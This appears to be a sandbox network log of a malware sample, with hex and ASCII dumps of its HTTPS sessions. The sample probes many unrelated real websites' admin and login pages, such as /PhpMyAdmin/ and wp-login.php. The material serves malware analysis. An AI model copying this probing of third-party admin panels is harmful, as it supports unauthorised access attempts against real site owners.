                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1369INData Raw: 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 72 75 6e 74 69 6d 65 3d 45 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 72 79
                                                                                                                                                                                                    Data Ascii: throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.ek)(e);n&&(n.runtime=E[e])}function R(e){return function(e){try
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1369INData Raw: 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61
                                                                                                                                                                                                    Data Ascii: .document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigator insta
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1369INData Raw: 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 65 26 26 28 73 5b 65 5d 7c 7c 28 73 5b 65 5d 3d 6e 65 77 20 4d 61 70 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 6c 65 74 20 65 3d
                                                                                                                                                                                                    Data Ascii: },8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){e&&(s[e]||(s[e]=new Map))}function d(){let e=
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1369INData Raw: 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 2c 67 65 74 3a 6d 2c 6c 69 73 74 65 6e 65 72 73 3a 76 2c 63 6f 6e 74 65 78 74 3a
                                                                                                                                                                                                    Data Ascii: .length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);return o},get:m,listeners:v,context:
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC1369INData Raw: 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67
                                                                                                                                                                                                    Data Ascii: ,!1},get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&&void 0!==arguments[2]&&arg


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    484192.168.2.452390185.135.132.1054436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC174OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC341INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 32 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:46 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 323Connection: closeLocation: http://www.grantstech.io/PhpMyAdmin/Cache-Control: max-age=0Expires: Sun, 26 Nov 2023 0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC323INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.grantstech.io/PhpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.5


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    485192.168.2.452352202.226.37.1584436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC167OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: daisyokogyo.co.jp
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC378INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, m
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16006INData Raw: 61 39 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 a4 a7 e6 98 ad e5 b7 a5 e6 a5 ad e6 a0 aa e5 bc 8f e4 bc 9a e7 a4 be 20 7c 20 e3 81 94 e3 81 bf e5 8f 8e e9 9b 86 e3 83 bb e6 8e 92 e6 b0 b4 e5 87 a6 e7 90 86 e8 a8 ad e5 82 99 e3 81 ae e7 b6 ad e6 8c 81 e7 ae a1 e7 90 86 20 7c 20 e5 90 8d e5 8f a4 e5 b1 8b e5 b8 82 e3 83 bb e6 84 9b e7 9f a5
                                                                                                                                                                                                    Data Ascii: a996<!DOCTYPE html><html lang="ja"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title> | |
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16384INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 73 2d 63 68 69 6c 64 32 5f 5f 75 6c 5f 5f 6c 69 6e 6b 5f 5f 64 69 76 20 69 73 2d 64 69 76 34 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 69 73 2d 63 68 69 6c 64 32 5f 5f 75 6c 5f 5f 6c 69 5f 5f 74 78 74 20 69 73 2d 70 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 0a 20 20 20 20
                                                                                                                                                                                                    Data Ascii: <div class="is-child2__ul__link__div is-div4"> </div> <p class="is-child2__ul__li__txt is-p4"> <span>
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16384INData Raw: 73 76 67 22 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 62 75 73 69 6e 65 73 73 5f 5f 69 6d 67 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 69 63 74 75 72 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 62 75 73 69 6e 65 73 73 5f 5f 64 69 76 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 62 75 73 69 6e 65 73 73 5f 5f 74 69 74 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 e8 b3 87 e6 ba 90 e5 be aa e7 92 b0 e4 ba 8b e6 a5 ad 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: svg" class="p-index__business__img1"> </picture> <div class="p-index__business__div1"> <p class="p-index__business__title"> </p>
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC9702INData Raw: 99 82 e5 a4 9a e9 87 8f e3 81 94 e3 81 bf e3 81 ae e5 8f 8e e9 9b 86 ef bc 88 e5 90 8d e5 8f a4 e5 b1 8b e5 b8 82 ef bc 89 e3 81 8c e5 a7 8b e3 81 be e3 82 8a e3 81 be e3 81 97 e3 81 9f e3 80 82 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 70 2d 69 6e 64 65 78 5f 5f 6e 65 77 73 5f 5f 6c 69 73 74 5f 5f 63 61 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 e3 81 8a e7 9f a5 e3 82 89 e3 81 9b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: </p> <p class="p-index__news__list__cat">


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    486192.168.2.452482162.241.62.2204436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC248OUTGET /wp-login.php?redirect_to=https%3A%2F%2Flumaruniformes.com%2Fwp-admin%2F&reauth=1 HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC162INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 05:59:46 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC83INData Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    487192.168.2.45250654.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC250OUTGET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=qn6eh6oumdk5qmj0m5efhe7rur
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC333INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 78 2d 72 6f 62 6f 74 73 2d 74 61 67 3a 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:46 GMTServer: Apache/2.4.52 (Ubuntu)x-frame-options: SAMEORIGINx-robots-tag: noindex, nofollowvary: X-Forwarded-Protocol,Accept-Encodingcache-control: no-cache, no-store, must-revalidateConnection:
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC7859INData Raw: 32 61 64 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4c 6f
                                                                                                                                                                                                    Data Ascii: 2ad4<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Lo
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC3111INData Raw: 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 72 65 73 6f 75 72 63 65 73 2f 74 68 65 6d 65 73 2f 6d 61 69 6e 2f 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2e 69 66 72 61 6d 65 2d 74 72 61 6e 73 70 6f 72 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 72 65 73 6f 75 72 63 65 73 2f 74 68 65 6d 65 73 2f 6d 61 69 6e 2f 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2e 66 69 6c 65 75 70 6c 6f 61 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 56 61 6c 69 64 61 74 65 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 61 73 70 6e 65 74 63 64 6e 2e 63 6f 6d 2f 61 6a 61 78 2f
                                                                                                                                                                                                    Data Ascii: <script src="/resources/themes/main/js/vendor/jquery.iframe-transport.js"></script> <script src="/resources/themes/main/js/vendor/jquery.fileupload.js"></script> ... Validate --> <script src="//ajax.aspnetcdn.com/ajax/
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    488192.168.2.452453194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC176OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC534INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 36 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:46 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://www.maxiv.lu.se/wp-json/>; r
